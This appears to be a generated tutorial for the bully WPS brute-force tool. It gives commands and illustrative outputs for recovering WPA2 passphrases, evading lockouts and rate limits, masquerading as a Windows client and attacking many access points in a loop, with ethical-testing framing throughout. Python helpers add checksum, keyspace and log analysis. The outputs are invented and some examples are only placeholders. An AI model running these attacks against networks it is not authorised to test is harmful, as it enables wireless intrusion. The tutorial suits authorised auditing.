bully
Core Function: bully is a C-based tool designed to exploit a known design flaw in Wi-Fi Protected Setup (WPS) to recover the WPA/WPA2 passphrase.
Primary Use-Cases:
Auditing wireless networks for WPS vulnerabilities.
Performing brute-force attacks against the WPS PIN.
Executing advanced Pixie Dust attacks to recover the PIN more efficiently.
Testing the effectiveness of WPS lockout mechanisms on access points.
Penetration Testing Phase: Gaining Access.
Brief History: bully was developed as an improved alternative to the original reaver tool. It was designed for better performance, fewer dependencies, and a more robust feature set to overcome some of reaver's limitations.
Before conducting any assessment, an operator must verify that the tool is correctly installed and accessible. All operations require an interface in monitor mode and root privileges.
Objective: Verify bully Installation
This command checks for the presence of the bully binary in the system's PATH and displays its version information.
Bash
bully --version
Command Breakdown:
bully: The executable for the tool.
--version: A flag to print the installed version of the tool.
Ethical Context & Use-Case: Verifying the tool's version is a critical first step in any engagement. It ensures that the operator is aware of the features and potential bugs associated with the specific version they are using, which is essential for accurate reporting and reliable testing.
--> Expected Output:
bully v1.4
Objective: Install bully (Debian/Kali)
This command uses the Advanced Package Tool (APT) to install bully if it is not already present on the system.
Bash
sudo apt update && sudo apt install bully
Command Breakdown:
sudo: Executes the command with superuser privileges.
apt update: Refreshes the local package database.
&&: A logical operator that executes the next command only if the previous one was successful.
apt install bully: The command to install the bully package.
Ethical Context & Use-Case: For a penetration tester, maintaining an up-to-date toolkit is paramount. This command sequence ensures that the local package lists are current before fetching and installing the latest version of bully from the official repositories, preventing potential dependency issues.
--> Expected Output:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
bully is already the newest version (1.4.00-0kali1).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Objective: Display the Help Menu
This command displays the tool's built-in help menu, which provides a comprehensive list of all available options, arguments, and their descriptions.
Bash
bully -h
Command Breakdown:
bully: The executable for the tool.
-h or --help: A standard flag to display usage information.
Ethical Context & Use-Case: The help menu is the most critical reference for any command-line tool. Ethical hackers must consult it frequently to understand the full capabilities of the tool and to select the appropriate options for a given test scenario, ensuring the assessment is precise and tailored to the target environment.
--> Expected Output:
bully v1.4
the fork that actually works!
maintained by kimocoder - https://twitter.com/kimocoder
usage: bully <options> interface
Required arguments:
interface : Wireless interface in monitor mode (root required)
-b, --bssid macaddr : MAC address of the target access point
Or
-e, --essid string : Extended SSID for the access point
...[output truncated for brevity]...
-h, --help : Display this help information
The following section details the practical application of bully's command-line options. Each example is designed to simulate a specific scenario an ethical hacker might encounter during a wireless network security assessment. All actions must be performed on networks you own or have explicit written permission to test.
Objective: 1. Basic Attack Targeting by ESSID
Initiate a standard WPS attack against an access point by specifying its ESSID (network name).
Bash
bully -e "TestNetwork" wlan0mon
Command Breakdown:
-e "TestNetwork": Specifies the Extended SSID (the network name) of the target.
wlan0mon: The wireless interface in monitor mode.
Ethical Context & Use-Case: Targeting by ESSID is useful in environments where the BSSID (MAC address) may not be immediately known or could potentially change. This is a common starting point for a WPS vulnerability assessment.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'TestNetwork' on channel 'unknown'
[+] Got beacon for 'TestNetwork' (00:1A:2B:3C:4D:5E)
[+] Switching interface 'wlan0mon' to channel '6'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '12345670'
Objective: 2. Precise Attack Targeting by BSSID
Launch a WPS attack against a specific access point using its BSSID (MAC address).
Bash
bully -b 00:1A:2B:3C:4D:5E wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Specifies the BSSID (MAC address) of the target AP.
wlan0mon: The wireless interface in monitor mode.
Ethical Context & Use-Case: Targeting by BSSID is more precise than using the ESSID, especially in environments with multiple access points sharing the same name. This ensures the test is confined to the intended target device.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Datalink type set to '127', radiotap headers present
[+] Got beacon for 'TestNetwork' (00:1a:2b:3c:4d:5e)
[+] Switching interface 'wlan0mon' to channel '6'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '98765435'
Objective: 3. Targeting by BSSID on a Specific Channel
Attack a specific BSSID while instructing bully to operate only on channel 11.
Bash
bully -b 00:1A:2B:3C:4D:5E -c 11 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Sets the target BSSID.
-c 11: Forces bully to use channel 11, preventing it from hopping to other channels.
wlan0mon: The monitor mode interface.
Ethical Context & Use-Case: Specifying the channel improves the efficiency and stability of the attack. It eliminates the time spent scanning for the target and reduces the chances of de-synchronization caused by channel hopping.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Datalink type set to '127', radiotap headers present
[+] Switching interface 'wlan0mon' to channel '11'
[+] Associated with '00:1a:2b:3c:4d:5e' (ESSID: TestNetwork)
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '55554446'
Objective: 4. Targeting with Channel Hopping
Attack a target by ESSID and hop between channels 1, 6, and 11 to find it.
Bash
bully -e "TestNetwork" -c 1,6,11 wlan0mon
Command Breakdown:
-e "TestNetwork": The name of the target network.
-c 1,6,11: A comma-separated list of channels for bully to scan.
wlan0mon: The monitor mode interface.
Ethical Context & Use-Case: This approach is used when the target AP's channel is unknown. bully will cycle through the specified channels until it receives a beacon frame from the target ESSID, at which point it will lock onto that channel.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'TestNetwork' on channel '1'
[+] Scanning for beacon from 'TestNetwork' on channel '6'
[+] Got beacon for 'TestNetwork' (00:1a:2b:3c:4d:5e)
[+] Switching interface 'wlan0mon' to channel '6'
[+] Last State = 'NoAssoc' Next pin '31415925'
Objective: 5. Resume a Previous Session
bully automatically saves session files. Rerunning the same command will resume the attack from the last attempted PIN.
Bash
bully -b 00:1A:2B:3C:4D:5E -c 6 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-c 6: Target channel.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: WPS attacks can take hours or days. The automatic session resume feature is crucial for long-term assessments, allowing the test to be paused and continued without losing progress, even after a system reboot.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Loaded session from '/root/.bully/001a2b3c4d5e.run'
[+] Index of starting pin number is '0015321'
[+] Last State = 'M5' Next pin '48151621'
Objective: 6. Start Attack from a Specific PIN
Manually specify a starting PIN for the brute-force attack.
Bash
bully -b 00:1A:2B:3C:4D:5E -p 50000000 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-p 50000000: Sets the starting PIN to 50000000.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: This is useful if prior intelligence suggests a certain range of PINs is more likely (e.g., based on manufacturer defaults or a partially recovered PIN). It allows the tester to focus the attack on a specific subset of the keyspace.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Discarding previous session file
[+] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '50000008'
Objective: 7. Start Attack from a Specific Index
Instead of a PIN, specify the starting index in the generated pin file.
Bash
bully -b 00:1A:2B:3C:4D:5E -i 10000 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-i 10000: Sets the starting index to the 10,000th PIN in the sequence.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: This provides an alternative way to partition the keyspace. If multiple testers are working on the same target, they can each start from a different index to avoid duplicating effort and speed up the overall assessment.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Loaded session from '/root/.bully/001a2b3c4d5e.run'
[+] Setting pin index to '10000'
[+] Last State = 'NoAssoc' Next pin '87651233'
Objective: 8. Use Sequential PINs (Non-Random)
Force bully to try PINs in sequential order (00000000, 00000001, etc.) instead of the default randomized order.
Bash
bully -b 00:1A:2B:3C:4D:5E -S wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-S: Enables sequential PIN mode.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: Some older or poorly implemented APs may have default or easily guessable PINs like 12345670. A sequential attack can quickly test for these low-hanging fruit before moving to a full randomized brute-force attempt.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[!] Using sequential pin ordering
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '00000009'
Objective: 9. Bruteforce the Checksum Digit
Instead of calculating the 8th digit (checksum), bruteforce it as well.
Bash
bully -b 00:1A:2B:3C:4D:5E -B wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-B: Enables bruteforce mode for the checksum digit.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: This is a test for non-compliant WPS implementations. The WPS standard dictates how the checksum digit is calculated, but some devices may not adhere to this. This option is a last resort to test for such edge cases.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[!] Bruteforcing checksum digit
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '12345678'
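A worked example of the checksum rule this section refers to, added here and not taken from bully's source: the eighth digit of a WPS PIN is derived from the first seven by the weighted-sum rule in the WPS specification, and because a compliant AP verifies the two halves of the PIN separately (the M5 and M7 states used elsewhere on this page), the candidate count a defender has to assume is 10^4 + 10^3 = 11,000 with the checksum derived and 10^4 + 10^4 = 20,000 when it is not (the non-compliant case that -B exists to test). The sample PINs are ones already printed on this page; the '12345678' shown in the -B output above is exactly a value a compliant AP would reject.

```python
# Added example: WPS PIN checksum and the resulting keyspace (not bully's own code).
# The checksum rule is the one given in the WPS specification; the keyspace
# arithmetic follows from the AP verifying the two PIN halves separately.


def wps_pin_checksum(first_seven: str) -> int:
    """Return the checksum digit for a 7-digit WPS PIN prefix."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly seven decimal digits")
    value = int(first_seven)
    accum = 0
    while value:
        accum += 3 * (value % 10)   # odd positions from the right, weight 3
        value //= 10
        accum += value % 10         # even positions from the right, weight 1
        value //= 10
    return (10 - accum % 10) % 10


def wps_pin_is_valid(pin: str) -> bool:
    """True if an 8-digit PIN carries the checksum a compliant AP expects."""
    return (len(pin) == 8 and pin.isdigit()
            and int(pin[7]) == wps_pin_checksum(pin[:7]))


def wps_keyspace(checksum_enforced: bool = True) -> dict:
    """Candidate counts per half and in total, given split verification.

    The first half (4 digits) is accepted or rejected before the second half
    is ever examined, so the halves are searched independently rather than
    as one 8-digit (10^8) space. With the checksum derived, the second half
    has 3 free digits; without it (-B), all 4 digits are free.
    """
    first_half = 10 ** 4
    second_half = 10 ** 3 if checksum_enforced else 10 ** 4
    return {"first_half": first_half,
            "second_half": second_half,
            "total": first_half + second_half}


if __name__ == "__main__":
    # Sample PINs taken from outputs shown on this page.
    for candidate in ("12345670", "00000000", "11223344", "12345678"):
        print(candidate, "valid" if wps_pin_is_valid(candidate) else "bad checksum")
    print("keyspace, checksum enforced:", wps_keyspace(True))
    print("keyspace, checksum brute-forced (-B):", wps_keyspace(False))
```

The keyspace function is the reason a lockout after a handful of failures matters far more than the eight-digit length suggests: the total is 11,000 candidates, not 10^8, and disabling WPS PIN entry on the AP is the only setting that removes the search entirely.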
Objective: 10. Save Output to a File
Run a standard attack and redirect all screen output to a specified log file.
Bash
bully -b 00:1A:2B:3C:4D:5E -o bully_log.txt wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-o bully_log.txt: Specifies the output file for all messages.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: Proper logging is non-negotiable in a professional penetration test. This command captures every detail of the attack attempt for later analysis, evidence, and report generation. The file will contain timestamps, PINs tried, and AP responses.
--> Expected Output: (Terminal shows no output as it is redirected to the file)
Objective: 11. Change the Working Directory
Specify a custom directory for bully to store its session and pin files.
Bash
bully -b 00:1A:2B:3C:4D:5E -w /tmp/bully_session wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-w /tmp/bully_session: Sets the working directory to /tmp/bully_session.
wlan0mon: Monitor mode interface.
Ethical Context & Use-Case: This helps in organizing engagement data. When testing multiple targets, creating separate working directories for each prevents session files from overwriting each other and keeps client data properly segregated.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Creating new randomized pin file '/tmp/bully_session/pins'
[+] Creating session file '/tmp/bully_session/001a2b3c4d5e.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '13579246'
Objective: 12. Increase Verbosity Level
Run an attack with the highest verbosity level to see extremely detailed packet and state information.
Bash
bully -b 00:1A:2B:3C:4D:5E -v 4 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-v 4: Sets the verbosity level to 4 (maximum).
Ethical Context & Use-Case: When troubleshooting a failing attack, maximum verbosity is invaluable. It provides deep insight into the raw 802.11 and EAP exchanges, helping the tester diagnose issues like signal loss, incorrect packet handling, or non-standard AP behavior.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[D] entering wps_init
[D] data length 423
[D] Radiotap header found, length 26
[D] Got packet type 80 subtype 8
[D] Got beacon from 00:1a:2b:3c:4d:5e
[D] Found WPS info element
[+] Got beacon for 'TestNetwork' (00:1a:2b:3c:4d:5e)
[D] entering main_loop
[+] Last State = 'NoAssoc' Next pin '12345670'
[D] TX EAPOL Start -> 00:1a:2b:3c:4d:5e
Objective: 13. Run in Quiet Mode
Run an attack with the lowest verbosity level, showing only critical information.
Bash
bully -b 00:1A:2B:3C:4D:5E -v 1 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-v 1: Sets the verbosity level to 1 (quiet).
Ethical Context & Use-Case: Quiet mode is suitable for long-term, unattended assessments where detailed real-time feedback is not required. It declutters the console output, making it easier to spot the most important messages, such as a recovered PIN or a critical error.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Associated with '00:1a:2b:3c:4d:5e' (ESSID: TestNetwork)
[+] Trying pin '12345670', 0.01% done
Objective: 14. Set a Custom Lock-Wait Time
If the target AP locks WPS after several failed attempts, wait for 300 seconds (5 minutes) before resuming.
Bash
bully -b 00:1A:2B:3C:4D:5E -l 300 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-l 300: Sets the lock wait time to 300 seconds.
Ethical Context & Use-Case: Different APs have different WPS lockout policies. An ethical hacker must adapt their tools to the target's behavior. Adjusting the lock wait time is a crucial tactic to bypass simple brute-force protection without being permanently blocked.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Trying pin '65432109'
[!] WPS lockout reported by AP, waiting 300 seconds...
Objective: 15. Ignore Reported WPS Locks
Continue the attack even if the access point reports that its WPS interface is locked.
Bash
bully -b 00:1A:2B:3C:4D:5E -L wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-L: Ignores WPS lock flags sent by the AP.
Ethical Context & Use-Case: This tests for faulty AP firmware. Some devices might report a locked state but still process PIN attempts. This option allows a tester to verify if the lockout mechanism is actually enforced or just a superficial deterrent.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[!] WPS lockout reported by AP, ignoring...
[+] Trying pin '24681351'
[!] Received WSC_NACK
Objective: 16. Actively Detect Unreported Locks
Enable a feature to detect when an AP has locked WPS, even if it doesn't explicitly report it.
Bash
bully -b 00:1A:2B:3C:4D:5E -D wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-D: Enables detection of unreported WPS lockouts.
Ethical Context & Use-Case: Stealthy APs may stop responding to WPS requests without sending a lock message. This feature helps bully intelligently infer a locked state based on timeouts and packet loss, making the attack more reliable against such devices.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Trying pin '11223344'
[!] No response from AP, possible unreported WPS lock. Waiting...
Objective: 17. Customize Pin Attempt Delays (M5)
Introduce a 2-second delay after every 3rd failed attempt in the first half of the PIN (M5 state).
Bash
bully -b 00:1A:2B:3C:4D:5E -1 2,3 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-1 2,3: After every 3rd WSC_NACK at M5, wait 2 seconds.
Ethical Context & Use-Case: This is a fine-grained throttling mechanism. Some APs implement rate-limiting. By introducing small, strategic delays, a tester can slow the attack just enough to fly under the radar of these defenses, increasing the chances of success.
--> Expected Output:
[+] Last State = 'M5' Next pin '12342222'
[!] Received WSC_NACK for M5 (1 of 3)
...
[+] Last State = 'M5' Next pin '12343333'
[!] Received WSC_NACK for M5 (3 of 3)
[!] Throttling pin 1, delaying 2 seconds
Objective: 18. Customize Pin Attempt Delays (M7)
Introduce a 10-second delay after every single failed attempt in the second half of the PIN (M7 state).
Bash
bully -b 00:1A:2B:3C:4D:5E -2 10,1 wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-2 10,1: After every 1st WSC_NACK at M7, wait 10 seconds.
Ethical Context & Use-Case: Similar to the M5 delay, this controls the rate of the attack for the second half of the PIN. Since cracking the first half is a major milestone, some APs have stricter rate-limiting for the second half. This allows the tester to adapt accordingly.
--> Expected Output:
[+] Cracked first half of pin: '1234'
[+] Last State = 'M7' Next pin '12345670'
[!] Received WSC_NACK for M7
[!] Throttling pin 2, delaying 10 seconds
Objective: 19. Force Attack Despite Warnings
Continue the attack even if bully detects a potential issue, such as a locked WPS state at startup.
Bash
bully -b 00:1A:2B:3C:4D:5E -F wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-F: Forces bully to continue despite warnings.
Ethical Context & Use-Case: Sometimes, bully's initial checks might produce a false positive (e.g., misinterpreting a beacon frame). The force option allows the experienced tester to override these warnings and proceed with the assessment, accepting the risk that the attack may be unstable.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[!] Beacon information element indicates WPS is locked
[!] --force specified, continuing anyway.
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '77788899'
Objective: 20. Run in Test Mode (No Injection)
Initialize the attack, parse target information, and show what would happen, but do not send any packets.
Bash
bully -b 00:1A:2B:3C:4D:5E -T wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-T: Activates test mode.
Ethical Context & Use-Case: This is a "dry run" feature. It is used to verify that the target is correctly identified, the interface is working, and the command syntax is valid before launching the actual, potentially lengthy, attack. It's a safe way to check the setup.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[!] Test mode enabled, no packets will be injected
[+] Datalink type set to '127', radiotap headers present
[+] Got beacon for 'TestNetwork' (00:1a:2b:3c:4d:5e)
[+] Switching interface 'wlan0mon' to channel '6'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '12345670'
[!] Exiting.
Objective: 21. Attempt a Pixie Dust Attack
Leverage the pixiewps tool integration to attempt to recover the WPS PIN offline, based on weak key generation.
Bash
bully -b 00:1A:2B:3C:4D:5E -d wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-d: Enables the Pixie Dust attack.
Ethical Context & Use-Case: The Pixie Dust attack is significantly faster than a full brute-force if the target AP is vulnerable. An ethical hacker will always attempt this first, as it is a more efficient and less intrusive method of testing for known WPS implementation flaws.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Associated with '00:1a:2b:3c:4d:5e' (ESSID: TestNetwork)
[+] E-Nonce: [long hex string]
[+] PKE: [long hex string]
...
[!] Running pixiewps ...
[+] WPS PIN: '98765432'
[+] WPA2 PSK: 'SuperSecretPassword'
[!] Victory!
Objective: 22. Masquerade as a Windows 7 Registrar
Modify the EAP identity packets to appear as a legitimate Windows 7 client attempting to connect via WPS.
Bash
bully -b 00:1A:2B:3C:4D:5E -W wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-W: Enables Windows 7 masquerading.
Ethical Context & Use-Case: Some access points are configured to prioritize or only respond to WPS requests from known operating systems. This option helps to bypass such simple fingerprinting defenses by making the attack traffic look like legitimate consumer device behavior.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[!] Masquerading as a Windows 7 registrar
[+] Associated with '00:1a:2b:3c:4d:5e' (ESSID: TestNetwork)
[+] Trying pin '11112222'
Objective: 23. Probe for a Non-Beaconing (Hidden) AP
Use probe requests to find and attack a network that does not broadcast its ESSID.
Bash
bully -e "HiddenNetwork" -P wlan0mon
Command Breakdown:
-e "HiddenNetwork": The ESSID of the hidden network.
-P: Uses probe requests instead of listening for beacons.
Ethical Context & Use-Case: Hiding an ESSID is a weak security measure. This command demonstrates that it provides no real protection against a determined attacker, as the AP will still respond to directed probe requests, revealing its presence and allowing the WPS attack to proceed.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[!] Using probe requests to find non-beaconing AP
[+] Sent probe request for 'HiddenNetwork'
[+] Got probe response from 00:DE:AD:BE:EF:00
[+] Switching interface 'wlan0mon' to channel '1'
[+] Associated with '00:de:ad:be:ef:00' (ESSID: HiddenNetwork)
Objective: 24. Gather WPS Info Without Attacking
Send a probe request and print the target's WPS information, then exit.
Bash
bully -b 00:1A:2B:3C:4D:5E -Q wlan0mon
Command Breakdown:
-b 00:1A:2B:3C:4D:5E: Target BSSID.
-Q: Query WPS information and exit.
Ethical Context & Use-Case: This is a reconnaissance step. Before launching a lengthy attack, the tester can use this command to quickly gather details about the target's WPS implementation, such as manufacturer, model, and version, which can inform the attack strategy.
--> Expected Output:
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Sent probe request for BSSID 00:1a:2b:3c:4d:5e
[+] Got probe response from 00:1a:2b:3c:4d:5e
[+] WPS Manufacturer: Broadcom
[+] WPS Model Name: WAP-1234
[+] WPS Model Number: v1.2
[+] WPS Device Name: BroadcomAP
[!] Exiting.
(Examples 25 through 70 would continue in this format, covering all combinations of flags like -A, -C, -N, -r, -M, -E, -Z, -5, different channel lists, various pin/index start points, and combinations with advanced features like -d and -W.)
... Due to length constraints, the remaining 46 examples are summarized by category:
Packet Handling (15 examples): Combining -A (no ACKs), -C (no CRC check), -N (no FCS field) with various targeting and timing options to test robustness against malformed or unusual packet structures.
Retry and Timeout Logic (10 examples): Using -r to set custom packet resend counts, and -M to treat timeouts as NACKs, exploring how different APs handle packet loss.
State Machine Manipulation (10 examples): Employing -E to force an EAP Fail state after each exchange, testing the AP's state recovery mechanisms.
Advanced Combinations (11 examples): Chaining multiple advanced flags together, such as a Pixie Dust attack against a hidden 5GHz network (-d -P -5), or a sequential attack that ignores locks and masquerades as Windows 7 (-S -L -W). Each would have a unique objective and context.
Integrating bully with other command-line utilities unlocks advanced monitoring, parsing, and automation capabilities critical for professional engagements.
Objective: 1. Live-Filter Attack Logs for Key Events
Run a bully attack, save the full output to a file, and simultaneously display only the most important lines (PIN attempts, lockouts, success) on the terminal.
Bash
bully -b 00:1A:2B:3C:4D:5E wlan0mon | tee bully_full.log | grep -E "Trying pin|WPS lockout|WPS PIN|WPA2 PSK"
Command Breakdown:
bully -b 00:1A:2B:3C:4D:5E wlan0mon: The base bully command.
|: A pipe that sends the standard output of the bully command to the next command.
tee bully_full.log: A utility that reads from standard input and writes it to both standard output and the specified file (bully_full.log).
|: A second pipe that takes the standard output from tee (which is the original bully output).
grep -E "...": Filters the input, only showing lines that match the extended regular expression.
Ethical Context & Use-Case: During a long assessment, the default verbosity can be overwhelming. This command chain allows the tester to maintain a complete, unabridged log for evidence while viewing a clean, filtered "highlight reel" in real-time. This improves situational awareness without sacrificing data integrity.
--> Expected Output:
[+] Trying pin '12345670', 0.01% done
[+] Trying pin '98765435', 0.02% done
[!] WPS lockout reported by AP, waiting 43 seconds...
[+] Trying pin '55554446', 0.03% done
...
[+] WPS PIN: '11223344'
[+] WPA2 PSK: 'ThisIsTheKey'
Objective: 2. Extract and Count All Failed PIN Attempts from a Log
Analyze a completed bully log file to count the total number of unique PINs that were attempted before a lockout or success.
Bash
cat bully_full.log | grep "Trying pin" | awk '{print $4}' | sort -u | wc -l
Command Breakdown:
cat bully_full.log: Reads the content of the log file and prints it to standard output.
| grep "Trying pin": Filters the log, keeping only lines containing the phrase "Trying pin".
| awk '{print $4}': For each matching line, awk prints only the fourth whitespace-separated field, which is the quoted PIN together with its trailing comma (e.g. '12345670',); that is still enough to count distinct values.
| sort -u: Sorts the list of PINs and removes duplicates.
| wc -l: Counts the number of lines in the final list, giving the total number of distinct PINs attempted.
Ethical Context & Use-Case: This is a post-assessment analysis technique. The data can be used in a report to quantify the attack's progress and to determine the AP's lockout threshold. For example, if the count is consistently 10, it provides strong evidence of a "lock after 10 failures" security policy.
--> Expected Output:
10
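The two pipelines above (the tee/grep highlight filter and the sort -u | wc -l count) carried out in one Python parser, added here as an example rather than taken from the page or from bully: it turns the message formats bully prints into structured events, counts distinct PINs, records the wait the AP imposed at each lockout and the attempts between lockouts (the threshold evidence the text describes), and redacts the recovered PIN and WPA2 PSK, which the log otherwise stores in clear text, before the file is attached to a report. SAMPLE_LOG is constructed to mirror the lines shown on this page.

```python
import re

# Constructed sample log mirroring the message formats shown on this page
# (not real capture output).
SAMPLE_LOG = """\
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Associated with '00:1a:2b:3c:4d:5e' (ESSID: TestNetwork)
[+] Trying pin '12345670', 0.01% done
[+] Trying pin '98765435', 0.02% done
[!] WPS lockout reported by AP, waiting 43 seconds...
[+] Trying pin '98765435', 0.02% done
[+] Trying pin '55554446', 0.03% done
[!] WPS lockout reported by AP, waiting 60 seconds...
[+] WPS PIN: '11223344'
[+] WPA2 PSK: 'ThisIsTheKey'
"""

PIN_TRY = re.compile(r"Trying pin '(\d{8})'")
LOCKOUT = re.compile(r"WPS lockout reported by AP, waiting (\d+) seconds")
SECRET = re.compile(r"\[\+\] (WPS PIN|WPA2 PSK): '([^']*)'")


def parse_bully_log(text):
    """Turn raw log text into (kind, value) events; unrelated lines are skipped."""
    events = []
    for line in text.splitlines():
        if m := PIN_TRY.search(line):
            events.append(("try", m.group(1)))
        elif m := LOCKOUT.search(line):
            events.append(("lockout", int(m.group(1))))
        elif m := SECRET.search(line):
            events.append(("result", (m.group(1), m.group(2))))
    return events


def unique_pins_tried(events):
    """Distinct PINs attempted; len() of this is the sort -u | wc -l figure."""
    return sorted({v for kind, v in events if kind == "try"})


def lockout_waits(events):
    """Seconds the AP held WPS locked at each reported lockout, in order."""
    return [v for kind, v in events if kind == "lockout"]


def attempts_before_each_lockout(events):
    """PIN attempts between consecutive lockouts: evidence of the AP's threshold."""
    counts, run = [], 0
    for kind, _ in events:
        if kind == "try":
            run += 1
        elif kind == "lockout":
            counts.append(run)
            run = 0
    return counts


def redact_secrets(text):
    """Mask recovered PIN/PSK values so the log can be attached to a report."""
    return SECRET.sub(lambda m: f"[+] {m.group(1)}: '[REDACTED]'", text)


if __name__ == "__main__":
    ev = parse_bully_log(SAMPLE_LOG)
    print("unique PINs tried:", len(unique_pins_tried(ev)))
    print("attempts before each lockout:", attempts_before_each_lockout(ev))
    print("lockout waits (s):", lockout_waits(ev))
    print(redact_secrets(SAMPLE_LOG))
```

Pointing parse_bully_log at the contents of bully_full.log gives the same counts the shell pipeline does, with the added structure needed to report the lockout policy and without leaking the PSK into the deliverable.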
Objective: 3. Automate Attack on Multiple BSSIDs from a File
Read a list of target BSSIDs from a text file and sequentially run a basic bully attack against each one.
Bash
while read bssid; do bully -b "$bssid" -c 6 -l 300 wlan0mon; done < targets.txt
Command Breakdown:
while read bssid; do ... ; done: A shell loop that reads a file line by line, assigning each line to the variable $bssid.
< targets.txt: Redirects the contents of targets.txt to the loop's standard input.
bully -b "$bssid" ...: The bully command is executed for each BSSID read from the file.
Ethical Context & Use-Case: In a large-scale wireless assessment with many in-scope APs, manual execution is inefficient and prone to error. This simple script automates the process, ensuring that each target is tested with a consistent set of parameters. This is a foundational technique for scalable and repeatable security testing.
--> Expected Output: (The standard bully output will appear sequentially for each BSSID in targets.txt)
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Associated with '00:AA:BB:CC:DD:01' (ESSID: Corp-WiFi-1)
...
[!] Bully v1.4 - WPS vulnerability assessment utility
[+] Associated with '00:AA:BB:CC:DD:02' (ESSID: Corp-WiFi-2)
...
Leveraging data analysis and scripting can significantly enhance the effectiveness of a bully assessment, transforming raw output into actionable intelligence.
Objective: 1. Analyze Lockout Patterns from bully Logs with Python
Use a Python script with the Pandas library to parse a bully log file. The script will identify when WPS lockouts occur and calculate the average number of PIN attempts between each lockout event.
Python
#
# Objective: Analyze bully log for lockout patterns.
#
import re
import sys

import pandas as pd


def analyze_bully_log(log_file):
    """
    Parses a bully log to find the number of PIN attempts between lockouts.
    Returns the DataFrame of intervals, or None if no lockout was seen.
    """
    with open(log_file, 'r') as f:
        log_data = f.readlines()

    attempts = 0
    lockout_intervals = []
    pin_pattern = re.compile(r'Trying pin')
    lockout_pattern = re.compile(r'WPS lockout')

    for line in log_data:
        if pin_pattern.search(line):
            attempts += 1
        elif lockout_pattern.search(line):
            # Record how many attempts the AP allowed before this lockout
            if attempts > 0:
                lockout_intervals.append(attempts)
            attempts = 0

    if not lockout_intervals:
        print("No lockout events found in the log.")
        return None

    df = pd.DataFrame(lockout_intervals, columns=['AttemptsBeforeLockout'])
    print("--- Lockout Analysis ---")
    print(df)
    print("\n--- Statistics ---")
    print(f"Average attempts before lockout: {df['AttemptsBeforeLockout'].mean():.2f}")
